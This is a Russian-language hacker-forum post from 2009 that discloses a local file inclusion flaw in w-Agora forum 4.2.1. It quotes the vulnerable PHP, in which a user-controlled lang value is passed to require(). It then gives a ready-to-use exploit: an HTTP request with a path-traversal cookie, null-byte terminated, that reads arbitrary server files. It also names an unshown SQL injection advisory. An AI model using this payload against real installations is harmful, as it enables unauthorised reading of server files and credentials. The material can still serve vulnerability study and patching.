Показать сообщение отдельно

  #49  
Старый 28.12.2009, 20:03
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
По умолчанию

w-Agora forum
Web site : http://www.w-agora.com
Version : 4.2.1


Local File Inclusion

Vuln file: globals.inc [str:169]
PHP код:
/*...*/
if (isset($_GET['lang']) ) {
    
$lang strtolower($_GET['lang']);
} elseif (isset(
$_POST['lang'])) {
    
$lang $_POST['lang'];
} elseif (isset(
$_COOKIE['wa_lang'])) {
    
$lang $_COOKIE['wa_lang'];
} elseif (isset(
$_SERVER['HTTP_ACCEPT_LANGUAGE']) ) {
    
$lang substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 02);
} elseif (isset(
$_COOKIE['lang'])) {
    
$lang strtolower($_COOKIE['lang']);
}
/*...*/
require ("$lang_dir/lang_$lang.inc");
/*...*/ 
Exploit:
if magic_quotes = OFF
Код:
GET http://[host]/[path]/index.php HTTP/1.0
Cookie: lang=/../../../../../../[local_file]%00
-------------------------------------------
w-Agora <= 4.2.1 (cat) Remote SQL Injection Vulnerability

Последний раз редактировалось RulleR; 28.12.2009 в 20:06..
 
Ответить с цитированием